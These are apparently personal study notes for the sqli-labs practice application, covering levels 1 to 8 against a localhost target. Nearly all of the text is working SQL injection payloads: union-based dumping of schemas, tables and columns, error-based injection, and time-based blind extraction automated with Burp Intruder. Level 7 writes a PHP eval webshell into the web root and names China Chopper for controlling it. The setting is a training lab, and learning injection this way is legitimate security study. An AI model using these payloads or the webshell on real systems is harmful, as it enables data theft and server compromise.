sqli-labs draft notes

Copy-pasting the payloads from this draft may fail when an editor has swapped the ASCII apostrophe (') for a typographic one or the two hyphens (--) for a dash; type them by hand and check every quote and dash is plain ASCII.

Less1

Three columns. The injection point is a single-quoted string (where id='$id'), so the payload opens with ' and closes with --+.
db = security

table = emails
columns = id, email_id

table = referers
columns = id, referer, ip_address

table = uagents
columns = id, uagent, ip_address

table = users
columns = id, username, password

List the tables of the current database one per request (step the LIMIT offset 0,1 / 1,1 / 2,1 / 3,1 to get all four):
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1--+

Walk the column names of one table the same way (the draft had limit 3,4, which skips the first three rows and returns nothing for a three-column table; step from limit 0,1 instead):
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,column_name,3 from information_schema.columns where table_schema=database() and table_name='referers' limit 0,1--+

Less2

Three columns. The injection point is numeric (where id=$id), so no quote is needed:
http://localhost/sqli-labs-master/Less-2/?id=1 order by 4--+
order by 3 renders normally, order by 4 errors, so three columns.
db = security

http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1--+
(without the table_schema filter the query lists tables from every schema on the server, not just security)

table = emails

http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,column_name,3 from information_schema.columns where table_schema=database() and table_name='emails' limit 0,1--+

column = id

http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,id,3 from emails limit 0,1--+

Less3

The variable is wrapped in a quote and a parenthesis: select * from table where id = ('$id');
so both have to be closed before the rest of the payload:
http://localhost/sqli-labs-master/Less-3/?id=1') order by 4--+

Less4

Double quote and parenthesis this time: select * from table where id = ("$id");

http://localhost/sqli-labs-master/Less-4/?id=1") order by 4%23
(%23 is the URL-encoded #, which works as the trailing comment just like --+)

Dump every schema name and every table of the current database in one request with group_concat:
http://localhost/sqli-labs-master/Less-4/?id=-1") union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
(the draft had table_schema='database()'; inside quotes that is the literal string database(), which matches no schema, so the function call must be unquoted)

Less5

No query result is displayed, but MySQL error messages are, so use error-based injection.
http://localhost/sqli-labs-master/Less-5/?id=1' order by 4%23

http://localhost/sqli-labs-master/Less-5/?id=1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,database(),0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);--+

Why this errors: floor(rand(0)*2) is a fixed sequence (0,1,1,0,1,1,...). GROUP BY evaluates the key once to look it up in its temporary table and again when inserting, so a key it just found absent is inserted as a duplicate and the query fails with "Duplicate entry '~security~1' for key 'group_key'", echoing the concatenated value in the error text. The FROM table only has to provide a few rows; information_schema.tables always does.

Less6

Same as Less5 but the string is double-quoted (where id="$id"):
http://localhost/sqli-labs-master/Less-6/?id=1" order by 4--+

http://localhost/sqli-labs-master/Less-6/?id=1" and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name='emails' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);--+

database = security
table = emails

Less7

From level to level only the delimiters PHP wraps around the variable change: single or double quotes and one or two parentheses. Less7 uses where id=(('$id')), so close the quote and both parentheses:
http://localhost/sqli-labs-master/Less-7/?id=1'))--+

Nothing is echoed, so write the result to a file instead. This only works because the lab's MySQL account has the FILE privilege and secure_file_priv allows the target directory; on a hardened server it fails silently.
http://localhost/sqli-labs-master/Less-7/?id=1')) union select version(),database(),user() into outfile 'd:\\3.txt'--+
This writes 3.txt to the root of D: containing version(), database() and user() (the doubled backslash is MySQL string escaping for one backslash).

http://localhost/sqli-labs-master/Less-7/?id=1')) union select 1,2,"<?php @eval($_POST['test']);?>" into outfile 'd:\\phpstudy_pro\\WWW\\1.php'--+
This payload writes a one-line PHP webshell (一句话木马) into the web root; it can then be managed with 中国菜刀 (China Chopper), password test.

Less8

Neither results nor errors are displayed, so use time-based blind injection: if(cond,sleep(5),1) makes the page take five seconds when cond is true.
Column count first:
http://localhost/sqli-labs-master/Less-8/?id=1' order by 4--+
order by 3 renders, order by 4 does not, so three columns.

Length of the database name:
http://localhost/sqli-labs-master/Less-8/?id=1' and if(length(database())=2,sleep(5),1)--+
Brute-force the number with Burp Intruder and look for the response that takes about five seconds.
8 characters

Database name, one character at a time:
http://localhost/sqli-labs-master/Less-8/?id=1' and if(ascii(mid(database(),1,1))=1,sleep(5),1)--+
Brute-force the ASCII value with Burp Intruder, or binary-search it using > instead of = (at most 7 requests per character instead of up to 95).
115 101 99 117 114 105 116 121 = database name
security

Number of tables in the database:
http://localhost/sqli-labs-master/Less-8/?id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=1,sleep(5),1)--+
(the column is table_schema; a first attempt with table_schemas never slept, which looks like "no tables" rather than a typo, so check the column name before trusting a negative)
Brute-force: four tables.

Length of the first table name:
http://localhost/sqli-labs-master/Less-8/?id=1' and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=1,sleep(5),1)--+
6

First table name:
http://localhost/sqli-labs-master/Less-8/?id=1' and if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=1,sleep(5),1)--+
Burp Intruder cluster bomb with two payload positions, the substr offset (1 to 6) and the ASCII value.
101 109 97 105 108 115 = emails

Number of columns in emails:
http://localhost/sqli-labs-master/Less-8/?id=1' and if((select count(column_name) from information_schema.columns where table_schema=database() and table_name='emails')=1,sleep(5),1)--+
2 columns

Column name lengths first:
http://localhost/sqli-labs-master/Less-8/?id=1' and if(length((select column_name from information_schema.columns where table_schema=database() and table_name='emails' limit 0,1))=1,sleep(5),1)--+
first column (limit 0,1): length 2
second column (limit 1,1): length 8

Column names:
http://localhost/sqli-labs-master/Less-8/?id=1' and if((select ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='emails' limit 0,1),1,1)))=1,sleep(5),1)--+
first: 105 100 = id
second: 101 109 97 105 108 95 105 100 = email_id

Length of the first value in the id column:
http://localhost/sqli-labs-master/Less-8/?id=1' and if((select length((select id from emails limit 0,1))=1),sleep(5),1)--+
1

Length of the first value in the email_id column:
http://localhost/sqli-labs-master/Less-8/?id=1' and if((select length((select email_id from emails limit 0,1))=1),sleep(5),1)--+
16

First value of email_id, one character at a time:
http://localhost/sqli-labs-master/Less-8/?id=1' and if((select ascii(substr((select email_id from emails limit 0,1),1,1))=10),sleep(5),1)--+
Brute-force the offset (1 to 16) and the ASCII value as above to recover the first email_id.